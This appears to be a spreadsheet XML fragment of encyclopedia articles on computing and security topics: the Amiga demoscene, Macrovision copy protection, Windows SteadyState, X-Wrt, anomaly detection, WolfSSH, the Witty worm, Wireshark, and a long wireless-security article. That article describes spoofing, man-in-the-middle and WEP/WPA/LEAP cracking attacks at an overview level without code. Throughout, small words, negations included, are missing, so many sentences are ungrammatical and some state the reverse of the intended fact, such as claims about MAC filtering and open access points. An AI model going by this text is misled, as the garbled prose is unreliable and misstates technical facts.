demos even featured source code part executable save hackers trouble disassembly, though came strewn incendiary comments would seek improve amiga demo groups equinox fairlight virtual dreams melon dezign phenomena spaceballs tristar sector incorporated external links amiga demoscene archive amigascne site kestra bitworld amiga demoscene database database 31000 demos amiga. scene.org classicamiga.com amiga demoscene directory amigademos.org archive amiga demos</t>
  </si>
  <si>
    <t>Analog Protection System</t>
  </si>
  <si>
    <t>analog protection system (aps), also known copyguard macrovision, copy protection system originally developed macrovision. video tapes copied dvds encoded become garbled unwatchable. process works adding pulses analog video signals negatively impact circuit recording device. digital devices, changes analog video signal created chip converts digital video analog within device. players, trigger bits created authoring inform applied players' analog outputs analog video outputs playing back protected dvd-video disc. boxes trigger bits incorporated conditional access entitlement control messages (ecm) stream delivered stb. vhs, alterations analog video signal added macrovision-provided “processor box” used duplicators. devices marketed "video stabilizers", along time base correctors, used attempt removal macrovision copy protection mechanism. digital recording devices (dvd recorders) often disallow recording detect protection signal input. unit display error message program copy protected. also signaled digitally, cgms-a field sent vertical blanking interval. references</t>
  </si>
  <si>
    <t>Windows SteadyState</t>
  </si>
  <si>
    <t>windows steadystate (formerly shared computer toolkit) discontinued freeware tool developed microsoft gives administrators enhanced options configuring shared computers, hard drive protection advanced user management. primarily designed computers shared many people, internet cafes, schools libraries. steadystate available december 2010 microsoft 32-bit versions windows windows vista. incompatible windows later. similar disk protection component included windows multipoint server 2012. features steadystate revert computer previously stored state every time reboots, administrator's request. when windows disk protection (wdp) component steadystate turned changes hard disk redirected temporary cache. offers three modes protection: discard mode: cache cleared upon every reboot, thus returning system previous state. persist mode: changes saved cache remain intact across reboots. administrator later commit changes. alternatively, specified date time, cache expires contents cleared. commit mode: contents cache written disk become permanent. addition, changes system longer redirected cache.steadystate prepare user environments. user accounts locked forced certain intervals. locked account uses temporary copy user's profile user's session. when user logs off, temporary profile deleted. this ensures changes user made session permanent. steadystate provides simple control restrictions covering individual users well system whole. many settings based windows group policies, others implemented steadystate itself. using steadystate, administrator forbid user performing actions undesirable environment. some settings include ability turn control panel, disable windows registry editing tools come windows, disable windows command prompt stop users executing batch files programs outside pre-approved folders. computer settings also applied. since steadystate would normally remove windows updates security patches installed, steadystate configured check apply updates manner removed upon rebooting. administrators also choose make system-wide changes, disabling welcome screen, removing shutdown dialog logon screen, hiding built-in windows administrator account. administrator block access specified programs per-user basis. steadystate presents list programs found program files directory windows common desktop. programs locations added manually. discontinuation microsoft discontinued steadystate. december 2010, longer available download. support available june 2011 microsoft support website. microsoft claims still possible prepare shared computer using native features windows system restore. effect, microsoft published creating steady state using microsoft technologies [sic] technet library. however, document introduce replacement wdp.windows added feature called assigned access restricts windows device running predetermined metro-style app. also reboot restore deep freeze (software) references</t>
  </si>
  <si>
    <t>X-Wrt</t>
  </si>
  <si>
    <t>x-wrt packages patches provide interface linux distribution openwrt. based haserl nothing window system. allows based management openwrt device. originally created package openwrt white russian. present found openwrt trunk webif package. some newer features dual-band support present. october 2013, x-wrt homepage moved google code. features x-wrt extension openwrt end-user. openwrt, prior release 8.09, minimal web-management console, whereas x-wrt supplied enhanced web-management console, webif², control status pages router. webif² pages include graphical traffic system status monitoring, pages control status network, wireless, security. controls provided data logging, booting, cron, nvram, file editing, linux package management, snmp, backup restore, firmware upgrade, wan, vlan, wi-fi, wep, wpa, wds, filtering, firewall, port forwarding, dhcp, dnsmasq, hostnames, control, routing, upnp, qos, dyndns, wol, openvpn, pptp, hotspots. references external links official website openwrt homepage table hardware supported openwrt</t>
  </si>
  <si>
    <t>Anomaly detection</t>
  </si>
  <si>
    <t>data analysis, anomaly detection (also referred outlier detection sometimes novelty detection) generally understood identification rare items, events observations deviate significantly majority data conform well defined notion normal behaviour. such examples arouse suspicions generated different mechanism, appear inconsistent remainder data.anomaly detection finds application many domains including cyber security, medicine, machine vision, statistics, neuroscience, enforcement financial fraud name few. anomalies initially searched clear rejection omission data statistical analysis, example compute mean standard deviation. they also removed better predictions models linear regression, recently removal aids performance machine learning algorithms. however, many applications anomalies interest observations desirous entire data set, need identified separated noise irrelevant outliers. three broad categories anomaly detection techniques exist. supervised anomaly detection techniques require data labeled "normal" "abnormal" involves training classifier. however, approach rarely used anomaly detection general unavailability labelled data inherent unbalanced nature classes. semi-supervised anomaly detection techniques assume portion data labelled. this combination normal anomalous data, often techniques construct model representing normal behavior given normal training data set, test likelihood test instance generated model. unsupervised anomaly detection techniques assume data unlabelled commonly used wider relevant application. definition many attempts made statistical computer science communities define anomaly. prevalent ones include: outlier observation deviates much observations arouse suspicions generated different mechanism. anomalies instances collections data occur rarely data whose features differ significantly data. outlier observation subset observations) appears inconsistent remainder data. anomaly point collection points relatively distant points multi-dimensional space features. anomalies patterns data conform well defined notion normal behaviour. observations univariate gaussian distribution point then z-score greater pre-selected threshold outlier. applications anomaly detection applicable large number variety domains, important subarea unsupervised machine learning. applications cyber-security intrusion detection, fraud detection, fault detection, system health monitoring, event detection sensor networks, detecting ecosystem disturbances, defect detection images using machine vision, medical diagnosis enforcement.anomaly detection proposed intrusion detection systems (ids) dorothy denning 1986. anomaly detection normally accomplished thresholds statistics, also done soft computing, inductive learning. types statistics proposed 1999 included profiles users, workstations, networks, remote hosts, groups users, programs based frequencies, means, variances, covariances, standard deviations. counterpart anomaly detection intrusion detection misuse detection. often used preprocessing remove anomalous data dataset. this done number reasons. statistics data mean standard deviation accurate removal anomalies, visualisation data also improved. supervised learning, removing anomalous data dataset often results statistically significant increase accuracy. anomalies also often important observations data found intrusion detection detecting abnormalities medical images. popular techniques many anomaly detection techniques proposed literature. some popular techniques are: statistical (z-score, tukey's range test grubbs's test) density-based techniques (k-nearest neighbor, local outlier factor, isolation forests, many variations concept) subspace-, correlation-based tensor-based outlier detection high-dimensional data one-class support vector machines replicator neural networks, autoencoders, variational autoencoders, long short-term memory neural networks bayesian networks hidden markov models (hmms) minimum covariance determinant clustering: cluster analysis-based outlier detection deviations association rules frequent itemsets fuzzy logic-based outlier detection ensemble techniques, using feature bagging, score normalization different sources diversitythe performance methods depends data parameters, methods little systematic advantages another compared across many data sets parameters. software elki open-source java data mining toolkit contains several anomaly detection algorithms, well index acceleration them. pyod open-source python library developed specifically anomaly detection. scikit-learn open-source python library built functionality provide unsupervised anomaly detection. datasets anomaly detection benchmark data repository carefully chosen data sets ludwig-maximilians-universität münchen; mirror university paulo. odds odds: large collection publicly available outlier detection datasets ground truth different domains. unsupervised anomaly detection benchmark harvard dataverse: datasets unsupervised anomaly detection ground truth. kmash data repository research data australia 12,000 anomaly detection datasets ground truth. also change detection statistical process control novelty detection hierarchical temporal memory references</t>
  </si>
  <si>
    <t>WolfSSL</t>
  </si>
  <si>
    <t>WolfSSH</t>
  </si>
  <si>
    <t>wolfssh small, portable, embedded library targeted embedded systems developers. open-source implementation written language. includes client libraries server implementation. allows password public authentication. platforms wolfssh currently available win32/64, linux, macos, solaris, threadx, vxworks, freebsd, netbsd, openbsd, embedded linux, wince, haiku, openwrt, iphone, android, nintendo gamecube devkitpro support, qnx, montavista, tron variants, nonstop opencl, micrium's microc/os-ii, freertos, safertos, freescale mqx, nucleus, tinyos, ti-rtos, hp-ux, utasker, embos. protocols wolfssh lightweight library implements sshv2 protocol. also includes support secure copy file transfer protocols. algorithms wolfssh uses cryptographic services provided wolfcrypt. wolfcrypt provides rsa, ecc, diffie–hellman, (cbc, gcm), random number generation, large integer support, base 16/64 encoding/decoding. exchange diffie-hellman-group1-sha1 diffie-hellman-group14-sha1 diffie-hellman-group-exchange-sha256 ecdh-sha2-nistp256 ecdh-sha2-nistp384 ecdh-sha2-nistp521 public ssh-rsa ecdsa-sha2-nistp256 ecdsa-sha2-nistp384 ecdsa-sha2-nistp521 integrity hmac-sha1 hmac-sha1-96 hmac-sha2-256 encryption aes128-cbc aes128-gcm (openssh compatible) licensing wolfssh open source, licensed gpl-3.0-or-later. also secure shell openssh dropbear comparison clients comparison servers comparison cryptography libraries references external links wolfssh homepage</t>
  </si>
  <si>
    <t>Witty (computer worm)</t>
  </si>
  <si>
    <t>witty worm computer worm attacked firewall computer security products written particular company, internet security systems (iss) internet security systems. first worm take advantage vulnerabilities pieces software designed enhance network security, carried destructive payload, unlike previous worms. named phrase "(^.^) insert witty message (^.^)" appears worm's payload. witty worm incident unique worm spread rapidly announcement vulnerability later), infected much smaller presumably harder-to-infect (because administrators taken security measures) host population previous worms. propagation march 2004, 'witty' worm began infecting hosts connected internet (and running vulnerable software) without seed population. within half-hour infected 12,000 computers generating gbit/s (gigabits second) traffic. effect worm once witty infects computer exploiting vulnerability software packages (realsecure network, realsecure server sensor, realsecure desktop, blackice), attempts infect computers using vulnerability. witty launches attacks fast possible, attacking pseudo-random subset addresses quickly allowed computer's internet connection. repeats attacks groups 20,000, alternately launching attacks overwriting sections computer's hard disk(s). references shannon, colleen david moore (2004). "the spread witty worm". (last updated june 2005; retrieved november 2005.) abhishek kumar, vern paxson nicholas weaver (2005). "outwitting witty worm". (last updated 2005; retrieved february 2006.) external links vulnerability announcement (from internet archive) analysis worm propagation caida (cooperative association internet data analysis) slashdot article</t>
  </si>
  <si>
    <t>Wireshark</t>
  </si>
  <si>
    <t>wireshark free open-source packet analyzer. used network troubleshooting, analysis, software communications protocol development, education. originally named ethereal, project renamed wireshark 2006 trademark issues.wireshark cross-platform, using widget toolkit current releases implement user interface, using pcap capture packets; runs linux, macos, bsd, solaris, unix-like operating systems, microsoft windows. there also terminal-based (non-gui) version called tshark. wireshark, programs distributed tshark, free software, released terms general public license version later version. functionality wireshark similar tcpdump, graphical front-end integrated sorting filtering options. wireshark lets user network interface controllers promiscuous mode supported network interface controller), traffic visible interface including unicast traffic sent network interface controller's address. however, capturing packet analyzer promiscuous mode port network switch, traffic switch necessarily sent port capture done, capturing promiscuous mode necessarily sufficient network traffic. port mirroring various network taps extend capture point network. simple passive taps extremely resistant tampering. linux, bsd, macos, libpcap 1.0.0 later, wireshark later also wireless network interface controllers monitor mode. remote machine captures packets sends captured packets machine running wireshark using tzsp protocol protocol used omnipeek, wireshark dissects packets, analyze packets captured remote machine time captured. history late 1990s, gerald combs, computer science graduate university missouri–kansas city, working small internet service provider. commercial protocol analysis products time priced around $1500 company's primary platforms (solaris linux), gerald began writing ethereal released first version around 1998. ethereal trademark owned network integration services. 2006, combs accepted cace technologies. combs still held copyright ethereal's source code (and rest re-distributable gpl), used contents ethereal subversion repository basis wireshark repository. however, ethereal trademark, changed name wireshark. 2010 riverbed technology purchased cace took primary sponsor wireshark. ethereal development ceased, ethereal security advisory recommended switching wireshark.wireshark several industry awards years, including eweek, infoworld, magazine. also top-rated packet sniffer insecure.org network security tools survey sourceforge project month august 2010.combs continues maintain overall code wireshark issue releases versions software. product website lists almost 2000 additional contributing authors. features wireshark data capturing program "understands" structure (encapsulation) different networking protocols. parse display fields, along meanings specified different networking protocols. wireshark uses pcap capture packets, capture packets types networks pcap supports. data captured "from wire" live network connection read file already-captured packets. live data read different types networks, including ethernet, ieee 802.11, ppp, loopback. captured network data browsed gui, terminal (command line) version utility, tshark. captured files programmatically edited converted command-line switches "editcap" program. data display refined using display filter. plug-ins created dissecting protocols. voip calls captured traffic detected. encoded compatible encoding, media flow even played. traffic captured. wireless connections also filtered long traverse monitored ethernet. various settings, timers, filters provide facility filtering output captured traffic.wireshark's native network trace file format libpcap format supported libpcap winpcap, exchange captured network traces applications format, including tcpdump netmaster. also read captures network analyzers, snoop, network general's sniffer, microsoft network monitor. security capturing network traffic interface requires elevated privileges platforms. reason, older versions wireshark tshark often superuser privileges. considering huge number protocol dissectors called traffic captured recognizing possibility dissector, serious security risk posed. rather large number vulnerabilities past many allowed remote code execution) developers' doubts better future development, openbsd removed ethereal ports tree prior openbsd 3.6.elevated privileges needed operations. example, alternative tcpdump dumpcap utility comes wireshark superuser privileges capture packets file, later analyze packets running wireshark restricted privileges. emulate near realtime analysis, captured file merged mergecap growing file processed wireshark. wireless networks, possible aircrack wireless security tools capture ieee 802.11 frames read resulting dump files wireshark. wireshark 0.99.7, wireshark tshark dumpcap perform traffic capture. platforms require special privileges capture traffic need dumpcap privileges. neither wireshark tshark need special privileges. color coding wireshark color packets based rules match particular fields packets, help user identify types traffic glance. default rules provided; users change existing rules coloring packets, rules, remove rules. simulation packet capture wireshark also used capture packets network simulation tools opnet modeler. also capsa (software) comparison packet analyzers etherape fiddler (software) netsniff-ng ngrep omnipeek tcptrace notes references external links official website</t>
  </si>
  <si>
    <t>Wireless security</t>
  </si>
  <si>
    <t>wireless security prevention unauthorized access damage computers data using wireless networks, include wi-fi networks. term also refer protection wireless network adversaries seeking damage confidentiality, integrity, availability network. common type wi-fi security, includes wired equivalent privacy (wep) wi-fi protected access (wpa). ieee 802.11 standard 1997. notoriously weak security standard: password uses often cracked minutes basic laptop computer widely available software tools. superseded 2003 wpa, wi-fi protected access. quick alternative improve security wep. current standard wpa2; hardware cannot support wpa2 without firmware upgrade replacement. wpa2 uses encryption device encrypts network 256-bit key; longer length improves security wep. enterprises often enforce security using certificate-based system authenticate connecting device, following standard 802.11x. many laptop computers wireless cards pre-installed. ability enter network mobile great benefits. however, wireless networking prone security issues. hackers found wireless networks relatively easy break into, even wireless technology hack wired networks. result, important enterprises define effective wireless security policies guard unauthorized access important resources. wireless intrusion prevention systems (wips) wireless intrusion detection systems (wids) commonly used enforce wireless security policies. risks users wireless technology increased service become popular. there relatively dangers wireless technology first introduced. hackers time latch technology, wireless networks commonly found work place. however, many security risks associated current wireless protocols encryption methods, carelessness ignorance exists user corporate level. hacking methods become much sophisticated innovative wireless access. hacking also become much easier accessible easy-to-use windows- linux-based tools made available charge. some organizations wireless access points installed feel need address wireless security concerns. in-stat meta group estimated corporate laptop computers planned purchased 2005 equipped wireless cards. issues arise supposedly non-wireless organization wireless laptop plugged corporate network. hacker could parking gather information laptops and/or devices, even break wireless card–equipped laptop gain access wired network. background anyone within geographical network range open, unencrypted wireless network "sniff", capture record, traffic, gain unauthorized access internal network resources well internet, information resources perform disruptive illegal acts. such security breaches become important concerns enterprise home networks. router security activated owner deactivates convenience, creates free hotspot. since 21st-century laptop wireless networking built (see intel "centrino" technology), need third-party adapter pcmcia card dongle. built-in wireless networking might enabled default, without owner realizing thus broadcasting laptop's accessibility computer nearby. modern operating systems linux, macos, microsoft windows make fairly easy wireless "base station" using internet connection sharing, thus allowing home access internet "base" however, lack knowledge among users security issues inherent setting systems often allow others nearby access connection. such "piggybacking" usually achieved without wireless network operator's knowledge; even without knowledge intruding user computer automatically selects nearby unsecured wireless network access point. threat situation wireless security aspect computer security; however, organizations particularly vulnerable security breaches caused rogue access points. employee (trusted entity) brings wireless router plugs unsecured switchport, entire network exposed anyone within range signals. similarly, employee adds wireless interface networked computer using open port, create breach network security would allow access confidential materials. however, effective countermeasures (like disabling open switchports switch configuration vlan configuration limit network access) available protect network information contains, countermeasures must applied uniformly network devices. threats vulnerabilites industrial (m2m) context availability cost, wireless communication technologies increases domains beyond originally intended usage areas, e.g. communication industrial applications. such industrial applications often specific security requirements. hence, important understand characteristics applications evaluate vulnerabilities bearing highest risk context. evaluation vulnerabilities resulting vulnerability catalogs industrial context considering wlan, zigbee available. mobility advantage wireless networks common, organizations individuals. many laptop computers wireless cards pre-installed. ability enter network mobile great benefits. however, wireless networking prone security issues. hackers found wireless networks relatively easy break into, even wireless technology hack wired networks. result, important enterprises define effective wireless security policies guard unauthorized access important resources. wireless intrusion prevention systems (wips) wireless intrusion detection systems (wids) commonly used enforce wireless security policies. interface link corruption risk there relatively dangers wireless technology first introduced, effort maintain communication high effort intrude always higher. variety risks users wireless technology increased service become popular technology commonly available. today great number security risks associated current wireless protocols encryption methods, carelessness ignorance exists user corporate level. hacking methods become much sophisticated innovative wireless. modes unauthorized access modes unauthorised access links, functions data variable respective entities make program code. there exist full scope model threat. extent prevention relies known modes methods attack relevant methods suppression applied methods. however, mode operation create options threatening. hence prevention requires steady drive improvement. described modes attack snapshot typical methods scenarios apply. accidental association violation security perimeter corporate network come number different methods intents. methods referred “accidental association”. when user turns computer latches wireless access point neighboring company's overlapping network, user even know occurred. however, security breach proprietary company information exposed could exist link company other. this especially true laptop also hooked wired network. accidental association case wireless vulnerability called "mis-association". mis-association accidental, deliberate (for example, done bypass corporate firewall) result deliberate attempts wireless clients lure connecting attacker's aps. malicious association “malicious associations” wireless devices actively made attackers connect company network laptop instead company access point (ap). these types laptops known “soft aps” created cyber criminal runs software makes his/her wireless network card look like legitimate access point. once thief gained access, he/she steal passwords, launch attacks wired network, plant trojans. since wireless networks operate layer level, layer protections network authentication virtual private networks (vpns) offer barrier. wireless 802.1x authentications help protection still vulnerable hacking. idea behind type attack break security measures. most likely criminal trying take client layer level. networks networks pose security threat. networks defined [peer peer] networks wireless computers access point them. while types networks usually little protection, encryption methods used provide security.the security hole provided networking network bridge provides networks, usually corporate environment, unfortunate default settings versions microsoft windows feature turned unless explicitly disabled. thus user even know unsecured network operation computer. also using wired wireless infrastructure network time, providing bridge secured organizational network unsecured connection. bridging forms. direct bridge, requires user actually configure bridge connections thus unlikely initiated unless explicitly desired, indirect bridge shared resources user computer. indirect bridge expose private data shared user's computer connections, shared folders private network attached storage, making distinction authenticated private connections unauthenticated ad-hoc networks. this presents threats already familiar open/public unsecured wifi access points, firewall rules circumvented case poorly configured operating systems local settings. non-traditional networks non-traditional networks personal network bluetooth devices safe hacking regarded security risk. even barcode readers, handheld pdas, wireless printers copiers secured. these non-traditional networks easily overlooked personnel narrowly focused laptops access points. identity theft (mac spoofing) identity theft spoofing) occurs hacker able listen network traffic identify address computer network privileges. most wireless systems allow kind filtering allow authorized computers specific gain access utilize network. however, programs exist network “sniffing” capabilities. combine programs software allow computer pretend address hacker desires, hacker easily around hurdle. filtering effective small residential (soho) networks, since provides protection wireless device "off air". 802.11 device air" freely transmits unencrypted address 802.11 headers, requires special equipment software detect anyone 802.11 receiver (laptop wireless adapter) freeware wireless packet analyzer obtain address transmitting 802.11 within range. organizational environment, wireless devices air" throughout active working shift, filtering provides false sense security since prevents "casual" unintended connections organizational infrastructure nothing prevent directed attack. man-in-the-middle attacks man-in-the-middle attacker entices computers computer soft (access point). once done, hacker connects real access point another wireless card offering steady flow traffic transparent hacking computer real network. hacker sniff traffic. type man-in-the-middle attack relies security faults challenge handshake protocols execute “de-authentication attack”. this attack forces ap-connected computers drop connections reconnect hacker's soft (disconnects user modem connect using password extract recording event). man-in-the-middle attacks enhanced software lanjack airjack automate multiple steps process, meaning required skill done script kiddies. hotspots particularly vulnerable attack since little security networks. denial service denial-of-service attack (dos) occurs attacker continually bombards targeted (access point) network bogus requests, premature successful connection messages, failure messages, and/or commands. these cause legitimate users able network even cause network crash. these attacks rely abuse protocols extensible authentication protocol (eap). attack little expose organizational data malicious attacker, since interruption network prevents flow data actually indirectly protects data preventing transmitted. usual reason performing attack observe recovery wireless network, initial handshake codes re-transmitted devices, providing opportunity malicious attacker record codes various cracking tools analyze security weaknesses exploit gain unauthorized access system. this works best weakly encrypted systems wep, number tools available launch dictionary style attack "possibly accepted" security keys based "model" security captured network recovery. network injection network injection attack, hacker make access points exposed non-filtered network traffic, specifically broadcasting network traffic “spanning tree” (802.1d), ospf, rip, hsrp. hacker injects bogus networking re-configuration commands affect routers, switches, intelligent hubs. whole network brought manner require rebooting even reprogramming intelligent networking devices. caffe latte attack caffe latte attack another defeat wep. necessary attacker area network using exploit. using process targets windows wireless stack, possible obtain remote client. sending flood encrypted requests, assailant takes advantage shared authentication message modification flaws 802.11 wep. attacker uses responses obtain less minutes. wireless intrusion prevention concepts there three principal ways secure wireless network. closed networks (like home users organizations) common configure access restrictions access points. those restrictions include encryption checks address. wireless intrusion prevention systems used provide wireless security network model. commercial providers, hotspots, large organizations, preferred solution often open unencrypted, completely isolated wireless network. users first access internet local network resources. commercial providers usually forward traffic captive portal provides payment and/or authorization. another solution require users connect securely privileged network using vpn. wireless networks less secure wired ones; many offices intruders easily visit hook computer wired network without problems, gaining access network, also often possible remote intruders gain access network backdoors like back orifice. general solution end-to-end encryption, independent authentication resources available public.there ready designed system prevent fraudulent usage wireless communication protect data functions wirelessly communicating computers entities. however, system qualifying taken measures whole according common understanding shall seen state art. system qualifying international consensus specified iso/iec 15408. wireless intrusion prevention system wireless intrusion prevention system (wips) concept robust counteract wireless security risks. however wips exist ready designed solution implement software package. wips typically implemented overlay existing wireless infrastructure, although deployed standalone enforce no-wireless policies within organization. wips considered important wireless security july 2009, payment card industry security standards council published wireless guidelines recommending wips automate wireless scanning protection large organizations. security measures there range wireless security measures, varying effectiveness practicality. ssid hiding simple ineffective method attempt secure wireless network hide ssid (service identifier). this provides little protection anything casual intrusion efforts. filtering simplest techniques allow access known, pre-approved addresses. most wireless access points contain type filtering. however, attacker simply sniff address authorized client spoof address. static addressing typical wireless access points provide addresses clients dhcp. requiring clients addresses makes difficult casual unsophisticated intruder onto network, provides little protection sophisticated attacker. 802.11 security ieee 802.1x ieee standard authentication mechanisms devices wishing attach wireless lan. regular wired equivalent privacy (wep) encryption standard original encryption standard wireless, since 2004 ratification wpa2 ieee declared "deprecated", often supported, seldom never default modern equipment. concerns raised security early 2001, dramatically demonstrated 2005 fbi, 2007 t.j. maxx admitted massive security breach part reliance payment card industry took 2008 prohibit even allowed existing continue june 2010. wpav1 wi-fi protected access (wpa wpa2) security protocols later created address problems wep. weak password, dictionary word short character string used, wpa2 cracked. using long enough random password (e.g. random letters) passphrase (e.g. randomly chosen words) makes pre-shared virtually uncrackable. second generation security protocol (wpa2) based final ieee 802.11i amendment 802.11 standard eligible fips 140-2 compliance. with encryption schemes, client network knows keys read traffic. wi-fi protected access (wpa) software/firmware improvement wep. regular wlan-equipment worked able simply upgraded equipment needs bought. trimmed-down version 802.11i security standard developed ieee 802.11 replace wep. tkip encryption algorithm developed provide improvements could fielded firmware upgrades existing 802.11 devices. profile also provides optional support aes-ccmp algorithm preferred algorithm 802.11i wpa2. enterprise provides radius based authentication using 802.1x. personal uses pre-shared shared (psk) establish security using character passphrase. also entered character hexadecimal string. weak passphrases broken using off-line dictionary attacks capturing messages four-way exchange client reconnects deauthenticated. wireless suites aircrack-ng crack weak passphrase less minute. other wep/wpa crackers airsnort auditor security collection. still, personal secure used ‘good’ passphrases full 64-character hexadecimal key. there information, however, erik tews (the created fragmentation attack wep) going reveal breaking tkip implementation tokyo's pacsec security conference november 2008, cracking encryption packet 12–15 minutes. still, announcement 'crack' somewhat overblown media, august, 2009, best attack (the beck-tews attack) partially successful works short data packets, cannot decipher key, requires specific implementations order work. additions wpav1 addition wpav1, tkip, wids added alongside. also, vpn-networks (non-continuous secure network connections) 802.11-standard. implementations include pptp, l2tp, ipsec ssh. however, extra layer security also cracked tools anger, deceit ettercap pptp; ike-scan, ikeprobe, ipsectrace, ikecrack ipsec-connections. tkip this stands temporal integrity protocol acronym pronounced tee-kip. this part ieee 802.11i standard. tkip implements per-packet mixing re-keying system also provides message integrity check. these avoid problems wep. wpa-improvement ieee 802.1x standard already improved authentication authorization access wireless wired lans. addition this, extra measures extensible authentication protocol (eap) initiated even greater amount security. this, uses central authentication server. unfortunately, 2002 maryland professor discovered shortcomings. over next years shortcomings addressed enhancements. this version called extended available several versions; include: eap-md5, peapv0, peapv1, eap-mschapv2, leap, eap-fast, eap-tls, eap-ttls, mschapv2, eap-sim. eap-versions eap-versions include leap, peap eap's. leap this stands lightweight extensible authentication protocol. this protocol based 802.1x helps minimize original security flaws using sophisticated management system. this eap-version safer eap-md5. this also uses address authentication. leap secure; thc-leapcracker used break cisco’s version leap used computers connected access point form dictionary attack. anwrap asleap finally crackers capable breaking leap.peap this stands protected extensible authentication protocol. this protocol allows secure transport data, passwords, encryption keys without need certificate server. this developed cisco, microsoft, security. other eaps there types extensible authentication protocol implementations based framework. framework established supports existing types well future authentication methods. eap-tls offers good protection mutual authentication. both client network authenticated using certificates per-session keys. eap-fast also offers good protection. eap-ttls another alternative made certicom funk software. convenient need distribute certificates users, offers slightly less protection eap-tls. restricted access networks solutions include newer system authentication, ieee 802.1x, promises enhance security wired wireless networks. wireless access points incorporate technologies like often also routers built thus becoming wireless gateways. end-to-end encryption argue layer layer encryption methods good enough protecting valuable data like passwords personal emails. those technologies encryption parts communication path, still allowing people traffic gained access wired network somehow. solution encryption authorization application layer, using technologies like ssl, ssh, gnupg, similar. disadvantage end-to-end method fail cover traffic. with encryption router level vpn, single switch encrypts traffic, even lookups. with end-to-end encryption hand, service secured must encryption "turned on", often every connection must also "turned separately. sending emails, every recipient must support encryption method, must exchange keys correctly. web, sites offer https, even browser sends addresses clear text. prized resource often access internet. office owner seeking restrict access face nontrivial enforcement task user authenticate router. 802.11i security newest rigorous security implement wlan's today 802.11i rsn-standard. this full-fledged 802.11i standard (which uses wpav2) however require newest hardware (unlike wpav1), thus potentially requiring purchase equipment. this hardware required either aes-wrap early version 802.11i) newer better aes-ccmp-equipment. make sure needs wrap ccmp-equipment, hardware standards compatible. wpav2 wpa2 wifi alliance branded version final 802.11i standard. primary enhancement inclusion aes-ccmp algorithm mandatory feature. both wpa2 support authentication methods using radius servers preshared (psk). number wpa2 networks increasing, number networks decreasing, security vulnerabilities wep. wpa2 found least security vulnerability, nicknamed hole196. vulnerability uses wpa2 group temporal (gtk), shared among users bssid, launch attacks users bssid. named page ieee 802.11i specification, vulnerability discussed. order exploit performed, must known attacker. additions wpav2 unlike 802.1x, 802.11i already additional security-services tkip. just wpav1, wpav2 work cooperation wids. wapi this stands wlan authentication privacy infrastructure. this wireless security standard defined chinese government. smart cards, tokens, software tokens security token method authentication relying upon authorized users possessing requisite token. smart cards physical tokens cards utilize embedded integrated circuit chip authentication, requiring card reader. tokens physical tokens connect port authenticate user. shielding it's practical cases apply specialized wall paint window film room building significantly attenuate wireless signals, keeps signals propagating outside facility. this significantly improve wireless security difficult hackers receive signals beyond controlled area facility, parking lot. denial service defense most attacks easy detect. however, difficult stop even detection. here three common ways stop attack. black holing black holing possible stopping attack. this situation drop packets attacker. this good long-term strategy attackers change source address quickly. this negative effects done automatically. attacker could knowingly spoof attack packets address corporate partner. automated defenses could block legitimate traffic partner cause additional problems. validating handshake validating handshake involves creating false opens, setting aside resources sender acknowledges. some firewalls address floods pre-validating handshake. this done creating false opens. whenever segment arrives, firewall sends back syn/ack segment, without passing segment target server. only firewall gets back ack, would happen legitimate connection, would firewall send original segment server originally intended. firewall aside resources connection segment arrives, handling large number false segments small burden. rate limiting rate limiting used reduce certain type traffic amount reasonably dealt with. broadcasting internal network could still used, limited rate example. this subtle attacks. this good attack aimed single server keeps transmission lines least partially open communication. rate limiting frustrates attacker, legitimate users. this helps fully solve problem. once traffic clogs access line going internet, nothing border firewall help situation. most attacks problems community stopped help isp's organizations whose computers taken bots used attack firms. mobile devices with increasing number mobile devices 802.1x interfaces, security mobile devices becomes concern. while open standards kismet targeted towards securing laptops, access points solutions extend towards covering mobile devices also. host based solutions mobile handsets pda's 802.1x interface. security within mobile devices fall three categories: protecting networks connecting rogue access points mutual authentication schemes wpa2 described abovewireless solutions offer wireless security mobile devices.mobile patient monitoring devices becoming integral part healthcare industry devices eventually become method choice accessing implementing health checks patients located remote areas. types patient monitoring systems, security reliability critical, influence condition patients, could leave medical professionals dark condition patient compromised. implementing network encryption order implement 802.11i, must first make sure router/access point(s), well client devices indeed equipped support network encryption. done, server radius, ads, nds, ldap needs integrated. this server computer local network, access point router integrated authentication server, remote server. ap's/routers integrated authentication servers often expensive specifically option commercial usage like spots. hosted 802.1x servers internet require monthly fee; running private server free disadvantage must server needs continuously.to server, server client software must installed. server software required enterprise authentication server radius, ads, nds, ldap. required software picked various suppliers microsoft, cisco, funk software, meetinghouse data, open-source projects. software includes: aradial radius server cisco secure access control software freeradius (open-source) funk software steel belted radius (odyssey) microsoft internet authentication service meetinghouse data eagis skyfriendz (free cloud solution based freeradius)client software comes built-in windows integrated os's using following software: aegis-client cisco acu-client intel proset/wireless software odyssey client xsupplicant (open1x)-project radius remote authentication dial user service (radius) (authentication, authorization accounting) protocol used remote network access. radius, developed 1991, originally proprietary published 1997 isoc documents 2138 2139. idea inside server gatekeeper verifying identities username password already pre-determined user. radius server also configured enforce user policies restrictions well record accounting information connection time purposes billing. open access points today, almost full wireless network coverage many urban areas infrastructure wireless community network (which consider future internet) already place. could roam around always connected internet nodes open public, security concerns, nodes encrypted users know disable encryption. many people consider proper etiquette leave access points open public, allowing free access internet. others think default encryption provides substantial protection small inconvenience, dangers open access fear substantial even home router. density access points even problem limited number channels available, partly overlap. each channel handle multiple networks, places many private wireless networks (for example, apartment complexes), limited number wi-fi radio channels might cause slowness problems. according advocates open access points, involve significant risks open wireless networks public: wireless network confined small geographical area. computer connected internet improper configurations security problems exploited anyone anywhere world, clients small geographical range exploit open wireless access point. thus exposure open wireless access point, risks open wireless network small. however, aware open wireless router give access local network, often including access file shares printers. keep communication truly secure end-to-end encryption. example, accessing internet bank, would almost always strong encryption browser bank thus risky banking unencrypted wireless network. argument anyone sniff traffic applies wired networks too, system administrators possible hackers access links read traffic. also, anyone knowing keys encrypted wireless network gain access data transferred network. services like file shares, access printers etc. available local net, advisable authentication (i.e. password) accessing (one never assume private network accessible outside). correctly safe allow access local network outsiders. with popular encryption algorithms today, sniffer usually able compute network minutes. common fixed monthly internet connection, traffic thus extra traffic detrimental. where internet connections plentiful cheap, freeloaders seldom prominent nuisance.on hand, countries including germany, persons providing open access point made (partially) liable illegal activity conducted access point. also, many contracts isps specify connection shared persons. also aircrack-ng electromagnetic shielding kismet krack list router firmware projects mobile security payment card industry data security standard stealth wallpaper tempest (codename) wireless intrusion prevention system wireless public infrastructure (wpki) exploits wireless networks references wi-foo: secrets wireless hacking (2004) isbn 978-0-321-20217-8 real 802.11 security: wi-fi protected access 802.11i (2003) isbn 